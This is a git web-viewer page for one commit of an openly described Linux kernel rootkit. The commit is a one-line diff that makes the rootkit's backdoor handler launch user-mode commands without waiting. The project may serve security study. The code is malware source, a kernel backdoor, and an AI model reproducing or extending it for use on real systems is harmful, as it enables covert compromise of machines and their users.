linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 38b7b71a3508188084ffdf34a0c57f638955f5f4
parent 8759b61a361ffb16a8560e9fa47cf0be570e18c6
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 12:02:18 +0100

adds nowait asynchronous backdoor handling

Diffstat:
Msrc/channel.c | 2+-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/channel.c b/src/channel.c @@ -97,7 +97,7 @@ handle_backdoor(unsigned long arg) NULL }; - call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC); + call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT); return 0; }